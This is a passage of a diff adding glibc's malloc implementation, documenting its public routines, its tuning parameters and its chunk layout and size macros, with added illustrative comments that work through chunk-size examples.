+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
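+
+/*
+   Illustrative usage sketch (editor's example, not from the original
+   sources): because realloc may move the block, the return value must be
+   checked before the old pointer is discarded.
+
+     #include <stdlib.h>
+
+     char *p = malloc (16);
+     char *q = realloc (p, 4096);   // may return p or a new block
+     if (q != NULL)
+       p = q;                       // on failure, p is left untouched
+ */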
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
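+
+/*
+   Illustrative usage sketch (editor's example, not from the original
+   sources):
+
+     #include <malloc.h>
+
+     int released = malloc_trim (0);   // pad of 0: keep no extra space
+     // released == 1 if any memory was returned to the system
+ */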
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
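+
+/* Worked example (editorial illustration): with SIZE_SZ == 4 (32-bit) the
+   default is 64 * 4 / 4 == 64 request bytes; with SIZE_SZ == 8 (64-bit) it
+   is 64 * 8 / 4 == 128, matching the defaults listed in the compile-time
+   option synopsis above.  */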
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped pages the kernel simply
+  has no choice but to zero them.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32-bit x86; at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand any more. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64-bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
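+
+/* Editor's note -- a worked example of the layout above for a typical
+   64-bit build (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16); illustrative only,
+   not part of upstream malloc.c:
+
+     void *mem = malloc (40);          // padded to a 0x30-byte chunk
+     // chunk == (char *) mem - 0x10, i.e. mem2chunk (mem)
+
+   The chunk's size field then reads 0x31 while the previous chunk is in
+   use: 0x30 for the size plus the P (PREV_INUSE) bit.  When a chunk of
+   this kind is freed into a normal bin (fastbin chunks keep their inuse
+   bit set, see exception 3 above), its size is also written into the
+   prev_size field of the next contiguous chunk -- the "foot" described
+   above -- and the next chunk's P bit is cleared.  */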
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
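+
+/* Editor's note (illustrative, not upstream): on a typical 64-bit build,
+   SIZE_SZ == 8 and MALLOC_ALIGNMENT == 16, so MIN_CHUNK_SIZE is 32
+   (prev_size + size + fd + bk) and MINSIZE rounds to 0x20 -- the familiar
+   smallest chunk size.  chunk2mem()/mem2chunk() then simply add/subtract
+   0x10 (2 * SIZE_SZ).  */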
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
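+
+/* Editor's note -- worked arithmetic for the macros above, assuming a
+   64-bit build (SIZE_SZ == 8, MALLOC_ALIGN_MASK == 15); illustrative
+   only, not part of upstream malloc.c:
+
+     request2size (0)   == MINSIZE == 0x20      (0 + 8 + 15 < MINSIZE)
+     request2size (24)  == (24 + 8 + 15) & ~15  == 0x20
+     request2size (25)  == (25 + 8 + 15) & ~15  == 0x30
+     request2size (120) == (120 + 8 + 15) & ~15 == 0x80
+
+   Only one SIZE_SZ of overhead is added because an in-use chunk may use
+   the prev_size field of its successor as data, which is why a 24-byte
+   request still fits in a 0x20-byte chunk.  */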
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
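+
+/* Editor's note (illustrative, not upstream): decoding a raw size field.
+   On a 64-bit build, a chunk p whose size field holds 0x95 gives
+
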